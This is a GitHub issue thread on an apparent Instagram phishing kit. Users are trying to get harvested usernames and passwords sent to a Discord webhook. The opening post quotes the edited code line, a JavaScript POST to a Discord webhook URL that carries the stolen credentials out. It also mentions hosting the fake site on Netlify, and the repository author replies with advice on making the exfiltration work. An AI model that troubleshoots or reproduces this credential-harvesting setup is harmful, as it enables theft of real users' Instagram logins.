### ISSUE TITLE
Webhook not working.

### ISSUE THREAD

**Issue by x0BlueDarkIce** [venaxyt/Instagram-Phishing#5]
I edited the line 101, and included my discord webhook, however even after successfully loading the site onot netlify, i'm not getting the webhook to type out the users, and passwords (self running).
edited 101 
request.open("POST","https://discord.com/api/webhooks/956202219252895774/0XzGXAcCQuiV2mWfEKt7S2tsI97sAWzk17yuiFxan65tK1ZxRkDa3XZig3-Zw9PFmq7");
also tried "POST" and" , "with space 
(dont worry ive not linked my webhook (link slightly changed/)

**Comment by venaxyt** [comment]
Bro you only have to replace WEBHOOK by the yours, nothing more and it will work don't worry.

**Comment by eaxie** [comment]
I've got the same issue
